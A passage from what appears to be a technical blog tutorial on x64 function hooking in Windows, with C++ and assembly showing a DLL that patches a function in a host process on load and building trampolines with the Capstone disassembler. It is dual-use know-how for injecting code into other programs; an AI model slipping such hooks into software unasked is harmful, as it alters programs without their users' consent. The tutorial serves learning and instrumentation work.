<span class="kt">void</span><span class="o">*</span> <span class="n">outAddr</span> <span class="o">=</span> <span class="n">VirtualAlloc</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">highAddr</span><span class="p">,</span> <span class="n">PAGE_SIZE</span><span class="p">,</span> <span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">outAddr</span><span class="p">)</span>
<span class="k">return</span> <span class="n">outAddr</span><span class="p">;</span>
<span class="p">}</span>
<span class="k">if</span> <span class="p">(</span><span class="n">lowAddr</span> <span class="o">></span> <span class="n">minAddr</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">outAddr</span> <span class="o">=</span> <span class="n">VirtualAlloc</span><span class="p">((</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">lowAddr</span><span class="p">,</span> <span class="n">PAGE_SIZE</span><span class="p">,</span> <span class="n">MEM_COMMIT</span> <span class="o">|</span> <span class="n">MEM_RESERVE</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">outAddr</span> <span class="o">!=</span> <span class="nb">nullptr</span><span class="p">)</span>
<span class="k">return</span> <span class="n">outAddr</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">pageOffset</span><span class="o">++</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">needsExit</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">uint64_t</span> <span class="nf">GetBaseModuleForProcess</span><span class="p">()</span>
<span class="p">{</span>
<span class="n">HANDLE</span> <span class="n">process</span> <span class="o">=</span> <span class="n">GetCurrentProcess</span><span class="p">();</span>
<span class="n">HMODULE</span> <span class="n">processModules</span><span class="p">[</span><span class="mi">1024</span><span class="p">];</span>
<span class="n">DWORD</span> <span class="n">numBytesWrittenInModuleArray</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="n">EnumProcessModules</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">processModules</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">HMODULE</span><span class="p">)</span> <span class="o">*</span> <span class="mi">1024</span><span class="p">,</span> <span class="o">&</span><span class="n">numBytesWrittenInModuleArray</span><span class="p">);</span>
<span class="n">DWORD</span> <span class="n">numRemoteModules</span> <span class="o">=</span> <span class="n">numBytesWrittenInModuleArray</span> <span class="o">/</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">HMODULE</span><span class="p">);</span>
<span class="n">CHAR</span> <span class="n">processName</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="n">GetModuleFileNameEx</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">,</span> <span class="n">processName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span> <span class="c1">//a null module handle gets the process name</span>
<span class="n">_strlwr_s</span><span class="p">(</span><span class="n">processName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="n">HMODULE</span> <span class="n">module</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="c1">//An HMODULE is the DLL's base address </span>
<span class="k">for</span> <span class="p">(</span><span class="n">DWORD</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">numRemoteModules</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">CHAR</span> <span class="n">moduleName</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="n">CHAR</span> <span class="n">absoluteModuleName</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span>
<span class="n">GetModuleFileNameEx</span><span class="p">(</span><span class="n">process</span><span class="p">,</span> <span class="n">processModules</span><span class="p">[</span><span class="n">i</span><span class="p">],</span> <span class="n">moduleName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="n">_fullpath</span><span class="p">(</span><span class="n">absoluteModuleName</span><span class="p">,</span> <span class="n">moduleName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="n">_strlwr_s</span><span class="p">(</span><span class="n">absoluteModuleName</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>
<span class="k">if</span> <span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">processName</span><span class="p">,</span> <span class="n">absoluteModuleName</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">module</span> <span class="o">=</span> <span class="n">processModules</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="p">}</span>
<span class="k">return</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">module</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">WriteAbsoluteJump64</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">absJumpMemory</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">addrToJumpTo</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint8_t</span> <span class="n">absJumpInstructions</span><span class="p">[]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0x49</span><span class="p">,</span> <span class="mh">0xBA</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span> <span class="mh">0x00</span><span class="p">,</span>
<span class="mh">0x41</span><span class="p">,</span> <span class="mh">0xFF</span><span class="p">,</span> <span class="mh">0xE2</span> <span class="p">};</span>
<span class="kt">uint64_t</span> <span class="n">addrToJumpTo64</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">addrToJumpTo</span><span class="p">;</span>
<span class="n">memcpy</span><span class="p">(</span><span class="o">&</span><span class="n">absJumpInstructions</span><span class="p">[</span><span class="mi">2</span><span class="p">],</span> <span class="o">&</span><span class="n">addrToJumpTo64</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">addrToJumpTo64</span><span class="p">));</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">absJumpMemory</span><span class="p">,</span> <span class="n">absJumpInstructions</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">absJumpInstructions</span><span class="p">));</span>
<span class="p">}</span>
<span class="kt">void</span> <span class="nf">InstallHook</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">targetFunction</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">payloadFunction</span><span class="p">)</span>
<span class="p">{</span>
<span class="kt">uint64_t</span> <span class="n">functionRVA</span> <span class="o">=</span> <span class="mh">0x6C6F0</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">func2HookAddr</span> <span class="o">=</span> <span class="n">GetBaseModuleForProcess</span><span class="p">()</span> <span class="o">+</span> <span class="n">functionRVA</span><span class="p">;</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">func2hook</span> <span class="o">=</span> <span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">func2HookAddr</span><span class="p">;</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">relayFuncMemory</span> <span class="o">=</span> <span class="n">AllocatePageNearAddress</span><span class="p">(</span><span class="n">func2hook</span><span class="p">);</span>
<span class="n">WriteAbsoluteJump64</span><span class="p">(</span><span class="n">relayFuncMemory</span><span class="p">,</span> <span class="n">NullPaint3DButtonHandler</span><span class="p">);</span> <span class="c1">//write relay func instructions</span>
<span class="c1">//now that the relay function is built, we need to install the E9 jump into the target func,</span>
<span class="c1">//this will jump to the relay function</span>
<span class="n">DWORD</span> <span class="n">oldProtect</span><span class="p">;</span>
<span class="n">VirtualProtect</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="mi">1024</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">,</span> <span class="o">&</span><span class="n">oldProtect</span><span class="p">);</span>
<span class="kt">uint8_t</span> <span class="n">jmpInstruction</span><span class="p">[</span><span class="mi">5</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0xE9</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span> <span class="p">};</span>
<span class="k">const</span> <span class="kt">uint64_t</span> <span class="n">relAddr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">relayFuncMemory</span> <span class="o">-</span> <span class="p">((</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">func2hook</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">));</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">jmpInstruction</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="o">&</span><span class="n">relAddr</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>
<span class="c1">//install the hook</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="n">jmpInstruction</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">));</span>
<span class="p">}</span>
<span class="kt">void</span><span class="o">*</span> <span class="nf">GetFunc2HookAddr</span><span class="p">()</span>
<span class="p">{</span>
<span class="kt">uint64_t</span> <span class="n">functionRVA</span> <span class="o">=</span> <span class="mh">0x6C6F0</span><span class="p">;</span>
<span class="kt">uint64_t</span> <span class="n">func2HookAddr</span> <span class="o">=</span> <span class="n">GetBaseModuleForProcess</span><span class="p">()</span> <span class="o">+</span> <span class="n">functionRVA</span><span class="p">;</span>
<span class="k">return</span> <span class="p">(</span><span class="kt">void</span><span class="o">*</span><span class="p">)</span><span class="n">func2HookAddr</span><span class="p">;</span>
<span class="p">}</span>
<span class="kt">int</span> <span class="nf">NullPaint3DButtonHandler</span><span class="p">()</span>
<span class="p">{</span>
<span class="k">return</span> <span class="mi">0</span><span class="p">;</span>
<span class="p">}</span>
<span class="n">BOOL</span> <span class="n">WINAPI</span> <span class="nf">DllMain</span><span class="p">(</span><span class="n">HINSTANCE</span> <span class="n">hinstDLL</span><span class="p">,</span> <span class="n">DWORD</span> <span class="n">ul_reason_for_call</span><span class="p">,</span> <span class="n">LPVOID</span> <span class="n">lpvReserved</span><span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span><span class="n">ul_reason_for_call</span> <span class="o">==</span> <span class="n">DLL_PROCESS_ATTACH</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">InstallHook</span><span class="p">(</span><span class="n">GetFunc2HookAddr</span><span class="p">(),</span> <span class="n">NullPaint3DButtonHandler</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">return</span> <span class="nb">true</span><span class="p">;</span>
<span class="p">}</span></code></pre></figure>
</details></div>
<h2 id="function-hooking-for-big-kids">Function Hooking for Big Kids</h2>
<p>The previous examples <em>technically</em> hooked a couple functions, but did so at the cost of destroying their original functionality. This meant that we couldn’t do things like modify function arguments being passed to the original functions, or add logging while preserving the original logic of the hooked programs. Real function hooking doesn’t have to make this trade, and our next two examples won’t either.</p>
<p>So far, the hooks we’ve created have had 3 parts: the hooked function, the relay function, and the hook payload. Now we need to add another step in this process, called a trampoline. With this new step, our hook process looks like this:</p>
<div align="center">
<img src="/images/post_images/2020-11-13/trampoline2.PNG" />
<br /><br />
</div>
<p>Rather than simply replace the initial instructions in the hooked function, we’re going to use those instructions to build a trampoline that we can call from a payload function when we want to execute the original version of the hooked function. A hook payload that uses a trampoline might look like this:</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span><span class="p">(</span><span class="o">*</span><span class="n">AddColorsTrampoline</span><span class="p">)(</span><span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">left</span><span class="p">,</span> <span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">right</span><span class="p">);</span>
<span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="nf">AddColorHookPayload</span><span class="p">(</span><span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">left</span><span class="p">,</span> <span class="n">Gdiplus</span><span class="o">::</span><span class="n">ARGB</span> <span class="n">right</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">//perform some new action</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Hook executed</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="c1">//replace one of the arguments being used to call</span>
<span class="c1">//the hooked function</span>
<span class="k">return</span> <span class="n">AddColorsTrampoline</span><span class="p">(</span><span class="mh">0xFFFF0000</span><span class="p">,</span> <span class="n">right</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>At a super high level, trampolines need to do two things:</p>
<ol>
<li>Execute the instructions that were overwritten when the hook jmp was installed in the hooked function.</li>
<li>Jump back to the body of the hooked function AFTER the installed jump instruction, so that the rest of the function can continue like normal.</li>
</ol>
<p>The first item on this list is really easy to get working for contrived cases, but really difficult to get right for real world use. Consider the following assembly (shown with the addresses of the instructions on the left):</p>
<figure class="highlight"><pre><code class="language-asm" data-lang="asm">EasyCase:
00007FF7F2691FF0 48 89 4C 24 08 mov qword ptr [rsp+8],rcx
00007FF7F2691FF5 55 push rbp
00007FF7F2691FF6 57 push rdi
00007FF7F2691FF7 48 81 EC 08 01 00 00 sub rsp,108h
00007FF7F2691FFE 48 8D 6C 24 20 lea rbp,[rsp+20h]
[Rest of function omitted]</code></pre></figure>
<p>This is an example of the “easy” case for creating a trampoline. The first 5 bytes of the function belong to one instruction, and that instruction doesn’t rely on any rip-relative addressing. All we need to do to make a trampoline for this function is copy the first 5 bytes to a buffer before we overwrite them with our hook, and then add a jump to 00007FF6E3521FF5 immediately after it. In assembly, this might look like this:</p>
<figure class="highlight"><pre><code class="language-asm" data-lang="asm">Trampoline:
48 89 4C 24 08 mov qword ptr [rsp+8],rcx
49 BA F5 1F 69 F2 F7 7F 00 00 mov r10,7FF7F2691FF5h
41 FF E2 jmp r10 </code></pre></figure>
<p>Functions that are harder to hook with a trampoline might have multiple instructions contained in their first 5 bytes, or use instructions with relative operands, like jumps or rip-relative addresses. The snippet below shows an example of a function that has some of these issues.</p>
<figure class="highlight"><pre><code class="language-asm" data-lang="asm">HardCase:
00007FF72B1F1390 85 C9 test ecx,ecx
00007FF72B1F1392 74 26 je TargetFunc+2Ah (07FF72B1F13BAh)
00007FF72B1F1394 83 F9 01 cmp ecx,1
00007FF72B1F1397 74 0C je TargetFunc+15h (07FF72B1F13A5h)
[Rest of function omitted]</code></pre></figure>
<p>In order to build a trampoline for this function, we’re going to have to get our hands dirty. First of all, we’re going to need to steal the first 7 bytes of this function instead of the first 5, so that we can execute whole instructions in our trampoline. Second, we’re going to need to do something about the je at 00007FF72B1F1392h, since it won’t make sense to do a relative jump once we relocate the instruction.</p>
<p>The next section of this post is going to walk through how to write code that deals with these “hard” issues, but as a bit of a teaser, here’s what the trampoline for this will look like:</p>
<figure class="highlight"><pre><code class="language-asm" data-lang="asm">HardCase_Trampoline:
85 C9 test ecx,ecx
74 10 je 000001FA4B770021 ; rewritten jump
83 F9 01 cmp ecx,1
49 BA 97 13 09 C0 F6 7F 00 00 mov r10, 7FF6C0091397h ; Jump to hooked function body
41 FF E2 jmp r10
49 BA BA 13 09 C0 F6 7F 00 00 mov r10, 7FF6C00913BAh ; Absolute Instruction Table Starts Here
41 FF E2 jmp r10 </code></pre></figure>
<p>This trampoline can be thought of as being made up of three sections (like a “jump sandwich”, which I thought was very funny when I wrote this at 5 am). It starts with the stolen bytes from the hooked instruction, with the relative instructions rewritten to jump to a later part of the trampoline. The meat of the sandwich is an absolute jump that goes back to the body of the hooked function (to an address <em>after</em> the jmp we installed for the hook). Finally, the bottom of the trampoline are absolute jumps (or calls, if we had any) that go to the addresses that the relative jumps/calls in the stolen bytes actually want to go.</p>
<div align="center">
<img src="/images/post_images/2020-11-13/trampoline_anatomy.PNG" />
<br /><br />
</div>
<p>Other sources refer to the absolute instruction table as a jump table, but I’m giving it a fancy name because it’s not going to contain jump instructions exclusively.</p>
<h2 id="example-3-building-a-trampoline-for-code-we-can-recompile">Example 3: Building a Trampoline For Code We Can Recompile</h2>
<p>We just saw the rough skeleton of the trampoline we’re going to build, now it’s time to write the code to build it. Roughly speaking, our plan of attack looks like this:</p>
<ol>
<li>“Steal” the first 5+ bytes (rounded up to the nearest whole instruction) of the function we want to hook.</li>
<li>Fixup any rip-relative addressing (like lea rcx,[rip+0xbeef])</li>
<li>For each relative jump or call instruction, calculate the address that it originally intended to reference, and add an absolute jmp/call to that address in the Absolute Instruction Table.</li>
<li>Rewrite the relative instructions in the stolen bytes to jump to their corresponding entry in the Absolute Instruction Table.</li>
<li>Write a jump back to the 6th byte of the hooked function immediately after the stolen instruction bytes, to continue executing the hooked function once the trampoline ends.</li>
</ol>
<p>These steps won’t be completed sequentially in our final program, but I’ve split them out into discrete steps to make explaining things easier.</p>
<p>For a bit of context, here’s what our final InstallHook() function is going to look like when we’re done. We’re going to be constructing a BuildTrampoline() function which will be given a pointer to some memory to write a trampoline into, and not much else. BuildTrampoline() is going to be called from a modified version of the InstallHook() function we had in our earlier example. Notice that BuildTrampoline() will also return the size, in bytes, of the trampoline that it creates.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">void</span> <span class="nf">InstallHook</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">func2hook</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">payloadFunc</span><span class="p">,</span> <span class="kt">void</span><span class="o">**</span> <span class="n">trampolinePtr</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">DWORD</span> <span class="n">oldProtect</span><span class="p">;</span>
<span class="n">VirtualProtect</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="mi">1024</span><span class="p">,</span> <span class="n">PAGE_EXECUTE_READWRITE</span><span class="p">,</span> <span class="o">&</span><span class="n">oldProtect</span><span class="p">);</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">hookMemory</span> <span class="o">=</span> <span class="n">AllocatePageNearAddress</span><span class="p">(</span><span class="n">func2hook</span><span class="p">);</span>
<span class="kt">uint32_t</span> <span class="n">trampolineSize</span> <span class="o">=</span> <span class="n">BuildTrampoline</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="n">hookMemory</span><span class="p">);</span>
<span class="o">*</span><span class="n">trampolinePtr</span> <span class="o">=</span> <span class="n">hookMemory</span><span class="p">;</span>
<span class="c1">//create the relay function</span>
<span class="kt">void</span><span class="o">*</span> <span class="n">relayFuncMemory</span> <span class="o">=</span> <span class="p">(</span><span class="kt">char</span><span class="o">*</span><span class="p">)</span><span class="n">hookMemory</span> <span class="o">+</span> <span class="n">trampolineSize</span><span class="p">;</span>
<span class="n">WriteAbsoluteJump64</span><span class="p">(</span><span class="n">relayFuncMemory</span><span class="p">,</span> <span class="n">payloadFunc</span><span class="p">);</span> <span class="c1">//write relay func instructions</span>
<span class="c1">//install the hook</span>
<span class="kt">uint8_t</span> <span class="n">jmpInstruction</span><span class="p">[</span><span class="mi">5</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mh">0xE9</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span><span class="p">,</span> <span class="mh">0x0</span> <span class="p">};</span>
<span class="k">const</span> <span class="kt">int32_t</span> <span class="n">relAddr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">int32_t</span><span class="p">)</span><span class="n">relayFuncMemory</span> <span class="o">-</span> <span class="p">((</span><span class="kt">int32_t</span><span class="p">)</span><span class="n">func2hook</span> <span class="o">+</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">));</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">jmpInstruction</span> <span class="o">+</span> <span class="mi">1</span><span class="p">,</span> <span class="o">&</span><span class="n">relAddr</span><span class="p">,</span> <span class="mi">4</span><span class="p">);</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">func2hook</span><span class="p">,</span> <span class="n">jmpInstruction</span><span class="p">,</span> <span class="k">sizeof</span><span class="p">(</span><span class="n">jmpInstruction</span><span class="p">));</span>
<span class="p">}</span></code></pre></figure>
<p>The intended use case for the trampoline pointer is to allow payload functions to call trampolines like regular functions, as shown in the snippet below.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">void</span><span class="p">(</span><span class="o">*</span><span class="n">TargetFuncTrampoline</span><span class="p">)(</span><span class="kt">int</span><span class="p">,</span> <span class="kt">float</span><span class="p">)</span> <span class="o">=</span> <span class="nb">nullptr</span><span class="p">;</span>
<span class="kt">void</span> <span class="nf">HookPayload</span><span class="p">(</span><span class="kt">int</span> <span class="n">x</span><span class="p">,</span> <span class="kt">float</span> <span class="n">y</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">printf</span><span class="p">(</span><span class="s">"Hook executed</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
<span class="n">TargetFuncTrampoline</span><span class="p">(</span><span class="n">x</span><span class="o">+</span><span class="mi">1</span><span class="p">,</span> <span class="n">y</span><span class="p">);</span>
<span class="p">}</span></code></pre></figure>
<p>Notice that we’re going to build the trampoline in the same “near” memory that the relay function is currently being constructed in. That’s going to make dealing with the rip-relative addressing a lot easier when we get it to it.</p>
<h3 id="step-1-stealing-instruction-bytes">Step 1: Stealing Instruction Bytes</h3>
<p>In order for our trampoline to work at all, it needs to execute the instructions that are overwritten when we install our hook. To do this, we need to “steal” these instruction bytes from our target function before overwriting them. The verb “steal” is important here - we’re not only going to copy these instruction bytes, we’re also going to replace them with 1 byte NOPs in the target function. That way won’t wind up with any partial instructions when we install the hook jump.</p>
<p>To make sure we steal whole instructions, we need to use a disassembly library. The rest of this article is going to use the <a href="http://www.capstone-engine.org/">Capstone</a> library for all disassembly tasks. Any disassembler will do, but Capstone has some features that are going to make our life easier later on.</p>
<p>This snippet shos how to steal the instructions contained within the first 5 bytes of a target function using Capstone. The StealBytes() function returns a struct with some additional data about the stolen instructions which we’ll use later.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="k">struct</span> <span class="nc">X64Instructions</span>
<span class="p">{</span>
<span class="n">cs_insn</span><span class="o">*</span> <span class="n">instructions</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">numInstructions</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">numBytes</span><span class="p">;</span>
<span class="p">};</span>
<span class="n">X64Instructions</span> <span class="nf">StealBytes</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">function</span><span class="p">)</span>
<span class="p">{</span>
<span class="c1">// Disassemble stolen bytes</span>
<span class="n">csh</span> <span class="n">handle</span><span class="p">;</span>
<span class="n">cs_open</span><span class="p">(</span><span class="n">CS_ARCH_X86</span><span class="p">,</span> <span class="n">CS_MODE_64</span><span class="p">,</span> <span class="o">&</span><span class="n">handle</span><span class="p">);</span>
<span class="n">cs_option</span><span class="p">(</span><span class="n">handle</span><span class="p">,</span> <span class="n">CS_OPT_DETAIL</span><span class="p">,</span> <span class="n">CS_OPT_ON</span><span class="p">);</span> <span class="c1">// we need details enabled for relocating RIP relative instrs</span>
<span class="kt">size_t</span> <span class="n">count</span><span class="p">;</span>
<span class="n">cs_insn</span><span class="o">*</span> <span class="n">disassembledInstructions</span><span class="p">;</span> <span class="c1">//allocated by cs_disasm, needs to be manually freed later</span>
<span class="n">count</span> <span class="o">=</span> <span class="n">cs_disasm</span><span class="p">(</span><span class="n">handle</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">function</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span><span class="n">function</span><span class="p">,</span> <span class="mi">20</span><span class="p">,</span> <span class="o">&</span><span class="n">disassembledInstructions</span><span class="p">);</span>
<span class="c1">//get the instructions covered by the first 5 bytes of the original function</span>
<span class="kt">uint32_t</span> <span class="n">byteCount</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="kt">uint32_t</span> <span class="n">stolenInstrCount</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">int32_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">count</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span> <span class="o">=</span> <span class="n">disassembledInstructions</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="n">byteCount</span> <span class="o">+=</span> <span class="n">inst</span><span class="p">.</span><span class="n">size</span><span class="p">;</span>
<span class="n">stolenInstrCount</span><span class="o">++</span><span class="p">;</span>
<span class="k">if</span> <span class="p">(</span><span class="n">byteCount</span> <span class="o">>=</span> <span class="mi">5</span><span class="p">)</span> <span class="k">break</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//replace instructions in target func wtih NOPs</span>
<span class="n">memset</span><span class="p">(</span><span class="n">function</span><span class="p">,</span> <span class="mh">0x90</span><span class="p">,</span> <span class="n">byteCount</span><span class="p">);</span>
<span class="n">cs_close</span><span class="p">(</span><span class="o">&</span><span class="n">handle</span><span class="p">);</span>
<span class="k">return</span> <span class="p">{</span> <span class="n">disassembledInstructions</span><span class="p">,</span> <span class="n">stolenInstrCount</span><span class="p">,</span> <span class="n">byteCount</span> <span class="p">};</span>
<span class="p">}</span></code></pre></figure>
<p>We’ll call this function right at the start of BuildTrampoline(), so it’s about time we started writing that function too. I’ve found the most intuitive way to structure BuildTrampoline() is to create 3 pointers at the start, each pointing to the next available location in each of the three sections of our trampoline memory. Whenever we write to a location pointed to by one of these pointers, we’ll then increment the pointer by that many bytes, so each of them is always pointing to an available memory address.</p>
<figure class="highlight"><pre><code class="language-c--" data-lang="c++"><span class="kt">uint32_t</span> <span class="nf">BuildTrampoline</span><span class="p">(</span><span class="kt">void</span><span class="o">*</span> <span class="n">func2hook</span><span class="p">,</span> <span class="kt">void</span><span class="o">*</span> <span class="n">dstMemForTrampoline</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">X64Instructions</span> <span class="n">stolenInstrs</span> <span class="o">=</span> <span class="n">StealBytes</span><span class="p">(</span><span class="n">func2hook</span><span class="p">);</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">stolenByteMem</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint8_t</span><span class="o">*</span><span class="p">)</span><span class="n">dstMemForTrampoline</span><span class="p">;</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">jumpBackMem</span> <span class="o">=</span> <span class="n">stolenByteMem</span> <span class="o">+</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">numBytes</span><span class="p">;</span>
<span class="kt">uint8_t</span><span class="o">*</span> <span class="n">absTableMem</span> <span class="o">=</span> <span class="n">jumpBackMem</span> <span class="o">+</span> <span class="mi">13</span><span class="p">;</span> <span class="c1">//13 is the size of the 64 bit mov/jmp instruction pair at jumpBackMem</span>
<span class="k">for</span> <span class="p">(</span><span class="kt">uint32_t</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o"><</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">numInstructions</span><span class="p">;</span> <span class="o">++</span><span class="n">i</span><span class="p">)</span>
<span class="p">{</span>
<span class="n">cs_insn</span><span class="o">&</span> <span class="n">inst</span> <span class="o">=</span> <span class="n">stolenInstrs</span><span class="p">.</span><span class="n">instructions</span><span class="p">[</span><span class="n">i</span><span class="p">];</span>
<span class="c1">//perform any fixup logic to the stolen instructions here</span>
<span class="n">memcpy</span><span class="p">(</span><span class="n">stolenByteMem</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">bytes</span><span class="p">,</span> <span class="n">inst</span><span class="p">.</span><span class="n">size</span><span class="p">);</span>
<span class="n">stolenByteMem</span> <span class="o">+=</span> <span class="n">inst</span><span class="p">.</span><span class="n">size</span><span class="p">;</span>
<span class="p">}</span>
<span class="c1">//write jump back to hooked func</span>
<span class="n">free</span><span class="p">(</span><span class="n">stolenInstrs</span><span class="p">.</span><span class="n">instructions</span><span class="p">);</span>
